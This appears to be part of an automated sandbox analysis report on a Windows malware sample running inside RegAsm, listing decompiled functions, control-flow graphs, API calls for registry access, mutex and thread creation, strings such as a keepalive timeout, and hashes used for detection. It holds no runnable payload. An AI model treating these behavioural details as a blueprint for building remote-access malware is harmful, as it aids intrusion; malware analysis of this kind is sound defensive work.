                                                                                              • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                              • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                              • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                                              • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                              • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                              • String ID:
                                                                                              • API String ID: 3658366068-0
                                                                                              • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                              • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                              • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                              • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                                                              Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1045 40da6f-40da94 call 401f86 1048 40da9a 1045->1048 1049 40dbbe-40dbe4 call 401f04 GetLongPathNameW call 40417e 1045->1049 1050 40dae0-40dae7 call 41c048 1048->1050 1051 40daa1-40daa6 1048->1051 1052 40db93-40db98 1048->1052 1053 40dad6-40dadb 1048->1053 1054 40dba9 1048->1054 1055 40db9a-40db9f call 43c11f 1048->1055 1056 40daab-40dab9 call 41b645 call 401f13 1048->1056 1057 40dacc-40dad1 1048->1057 1058 40db8c-40db91 1048->1058 1075 40dbe9-40dc56 call 40417e call 40de0c call 402fa5 * 2 call 401f09 * 5 1049->1075 1070 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1050->1070 1071 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1050->1071 1061 40dbae-40dbb3 call 43c11f 1051->1061 1052->1061 1053->1061 1054->1061 1066 40dba4-40dba7 1055->1066 1079 40dabe 1056->1079 1057->1061 1058->1061 1072 40dbb4-40dbb9 call 409092 1061->1072 1066->1054 1066->1072 1084 40dac2-40dac7 call 401f09 1070->1084 1071->1079 1072->1049 1079->1084 1084->1049
                                                                                              APIs
                                                                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LongNamePath
                                                                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                              • API String ID: 82841172-425784914
                                                                                              • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                              • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                              • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                              • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                                                                              Function 0044ACC9 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1127 44acc9-44ace2 1128 44ace4-44acf4 call 4467e6 1127->1128 1129 44acf8-44acfd 1127->1129 1128->1129 1139 44acf6 1128->1139 1130 44acff-44ad07 1129->1130 1131 44ad0a-44ad2e MultiByteToWideChar 1129->1131 1130->1131 1133 44ad34-44ad40 1131->1133 1134 44aec1-44aed4 call 43502b 1131->1134 1136 44ad94 1133->1136 1137 44ad42-44ad53 1133->1137 1143 44ad96-44ad98 1136->1143 1140 44ad55-44ad64 call 457210 1137->1140 1141 44ad72-44ad83 call 4461b8 1137->1141 1139->1129 1146 44aeb6 1140->1146 1154 44ad6a-44ad70 1140->1154 1141->1146 1155 44ad89 1141->1155 1143->1146 1147 44ad9e-44adb1 MultiByteToWideChar 1143->1147 1149 44aeb8-44aebf call 435ecd 1146->1149 1147->1146 1148 44adb7-44adc9 call 448c33 1147->1148 1156 44adce-44add2 1148->1156 1149->1134 1158 44ad8f-44ad92 1154->1158 1155->1158 1156->1146 1159 44add8-44addf 1156->1159 1158->1143 1160 44ade1-44ade6 1159->1160 1161 44ae19-44ae25 1159->1161 1160->1149 1162 44adec-44adee 1160->1162 1163 44ae27-44ae38 1161->1163 1164 44ae71 1161->1164 1162->1146 1165 44adf4-44ae0e call 448c33 1162->1165 1167 44ae53-44ae64 call 4461b8 1163->1167 1168 44ae3a-44ae49 call 457210 1163->1168 1166 44ae73-44ae75 1164->1166 1165->1149 1180 44ae14 1165->1180 1171 44ae77-44ae90 call 448c33 1166->1171 1172 44aeaf-44aeb5 call 435ecd 1166->1172 1167->1172 1179 44ae66 1167->1179 1168->1172 1183 44ae4b-44ae51 1168->1183 1171->1172 1185 44ae92-44ae99 1171->1185 1172->1146 1184 44ae6c-44ae6f 1179->1184 1180->1146 1183->1184 1184->1166 1186 44aed5-44aedb 1185->1186 1187 44ae9b-44ae9c 1185->1187 1188 44ae9d-44aead WideCharToMultiByte 1186->1188 1187->1188 1188->1172 1189 44aedd-44aee4 call 435ecd 1188->1189 1189->1149
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                              • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                              • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                              • __freea.LIBCMT ref: 0044AEB0
                                                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                              • __freea.LIBCMT ref: 0044AEB9
                                                                                              • __freea.LIBCMT ref: 0044AEDE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3864826663-0
                                                                                              • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                                              • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                              • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                                              • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                              Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1192 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1203 41b3ad-41b3d8 call 4135e1 call 401fab StrToIntA 1192->1203 1204 41b3ee-41b3f7 1192->1204 1214 41b3e6-41b3e9 call 401fd8 1203->1214 1215 41b3da-41b3e3 call 41cffa 1203->1215 1205 41b400 1204->1205 1206 41b3f9-41b3fe 1204->1206 1208 41b405-41b410 call 40537d 1205->1208 1206->1208 1214->1204 1215->1214
                                                                                              APIs
                                                                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                              • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentOpenProcessQueryValue
                                                                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                              • API String ID: 1866151309-2070987746
                                                                                              • Opcode ID: 62dfa6f9f345238f46b05bc442edba73b39087c51621fed3685a745c3b5471c1
                                                                                              • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                                              • Opcode Fuzzy Hash: 62dfa6f9f345238f46b05bc442edba73b39087c51621fed3685a745c3b5471c1
                                                                                              • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                                                              Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1266 404f51-404f5f 1267 404f65-404f6c 1266->1267 1268 404fea 1266->1268 1270 404f74-404f7b 1267->1270 1271 404f6e-404f72 1267->1271 1269 404fec-404ff1 1268->1269 1272 404fc0-404fe8 CreateEventA CreateThread 1270->1272 1273 404f7d-404fbb GetLocalTime call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1270->1273 1271->1272 1272->1269 1273->1272
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                              Strings
                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Create$EventLocalThreadTime
                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                              • API String ID: 2532271599-1507639952
                                                                                              • Opcode ID: bb891c265521bbac9f5eb37e18d522f6691bbdaa432d4adda5fe173935d73b6f
                                                                                              • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                                              • Opcode Fuzzy Hash: bb891c265521bbac9f5eb37e18d522f6691bbdaa432d4adda5fe173935d73b6f
                                                                                              • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                                              Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1283 4137aa-4137c1 RegCreateKeyA 1284 4137c3-4137f8 call 40247c call 401fab RegSetValueExA RegCloseKey 1283->1284 1285 4137fa 1283->1285 1287 4137fc-41380a call 401fd8 1284->1287 1285->1287
                                                                                              APIs
                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                              • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                              • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValue
                                                                                              • String ID: pth_unenc
                                                                                              • API String ID: 1818849710-4028850238
                                                                                              • Opcode ID: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                                                              • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                              • Opcode Fuzzy Hash: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                                                              • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                              Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1293 4485e6-4485fa 1294 448607-448622 LoadLibraryExW 1293->1294 1295 4485fc-448605 1293->1295 1297 448624-44862d GetLastError 1294->1297 1298 44864b-448651 1294->1298 1296 44865e-448660 1295->1296 1299 44863c 1297->1299 1300 44862f-44863a LoadLibraryExW 1297->1300 1301 448653-448654 FreeLibrary 1298->1301 1302 44865a 1298->1302 1303 44863e-448640 1299->1303 1300->1303 1301->1302 1304 44865c-44865d 1302->1304 1303->1298 1305 448642-448649 1303->1305 1304->1296 1305->1304
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                              • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                              • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                              • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                              • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                                              Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1306 40d0a4-40d0d0 call 401fab CreateMutexA GetLastError
                                                                                              APIs
                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                              • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateErrorLastMutex
                                                                                              • String ID: SG
                                                                                              • API String ID: 1925916568-3189917014
                                                                                              • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                              • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                                                              • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                              • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                                                              Function 004135E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1309 4135e1-41360d RegOpenKeyExA 1310 413642 1309->1310 1311 41360f-413637 RegQueryValueExA RegCloseKey 1309->1311 1312 413644 1310->1312 1311->1312 1313 413639-413640 1311->1313 1314 413649-413655 call 402093 1312->1314 1313->1314
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                              • RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                              • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                              • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                                              • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                              • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                                              Function 00413584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                              • RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                              • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                              • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                                              • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                              • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                                              Function 0041353A Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                                                                              • RegQueryValueExA.KERNEL32 ref: 00413565
                                                                                              • RegCloseKey.KERNEL32(?), ref: 00413570
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                              • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                                              • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                              • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                                              Function 004138B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                              • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                              • RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValue
                                                                                              • String ID:
                                                                                              • API String ID: 1818849710-0
                                                                                              • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                              • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                              • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                              • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                              Function 0044EE44 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Info
                                                                                              • String ID:
                                                                                              • API String ID: 1807457897-3916222277
                                                                                              • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                              • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                                                                              • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                              • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                                                                              Function 00409E1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: pQG
                                                                                              • API String ID: 176396367-3769108836
                                                                                              • Opcode ID: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                                                              • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                                              • Opcode Fuzzy Hash: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                                                              • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                                              Function 00448C33 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: String
                                                                                              • String ID: LCMapStringEx
                                                                                              • API String ID: 2568140703-3893581201
                                                                                              • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                              • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                                                              • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                              • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                                                              Function 00448B04 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                                                                              Strings
                                                                                              • InitializeCriticalSectionEx, xrefs: 00448B1F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                              • API String ID: 2593887523-3084827643
                                                                                              • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                              • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                                                                              • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                              • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                                                                              Function 00448790 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Alloc
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2773662609-671089009
